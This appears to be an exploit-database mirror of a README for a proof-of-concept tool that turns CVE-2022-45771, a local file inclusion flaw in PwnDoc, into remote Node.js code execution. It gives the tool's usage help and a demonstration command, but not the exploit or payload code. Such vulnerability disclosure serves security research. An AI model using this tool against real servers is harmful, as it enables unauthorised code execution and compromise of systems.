Share
## https://sploitus.com/exploit?id=F491282A-3C7F-5B95-92AB-D5450AC75941
<p align="center">
<a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
<a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
<br>
</p>
Pwndoc local file inclusion to remote code execution of Node.js code on the server, discovered by [@yuriisanin](https://github.com/yuriisanin)
## Features
- [x] Custom Node.js code to execute server-side using `--payload-file`
- [x] Cleanup after exploit
## Requirements
- [x] An admin account on the PwnDoc instance
## Usage
```
$ ./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -h
CVE-2022-45771 Pwndoc-LFI-to-RCE v1.1 - by @podalirius_
usage: CVE-2022-45771-Pwndoc-LFI-to-RCE.py [-h] -u USERNAME -p PASSWORD -H HOST [-P PORT] [-v] [--http] [-f PAYLOAD_FILE]
Poc of CVE-2022-45771 Pwndoc-LFI-to-RCE
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Pwndoc username
-p PASSWORD, --password PASSWORD
Pwndoc password
-H HOST, --host HOST Pwndoc ip
-P PORT, --port PORT Pwndoc port
-v, --verbose Verbose mode. (default: False)
--http HTTP mode. (default: False)
-f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
File containing node.js code to run on the server.
```
## Demonstration
```
./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -u admin -p 'Admin123!' --host 127.0.0.1 --payload-file files/exploit.js
```
https://user-images.githubusercontent.com/79218792/207442497-3228c436-5755-4a9a-9931-b23402dc9e86.mp4
## References
- Issue https://github.com/pwndoc/pwndoc/issues/401 by [@yuriisanin](https://github.com/yuriisanin)
- https://www.youtube.com/watch?v=jffBkEdF7RY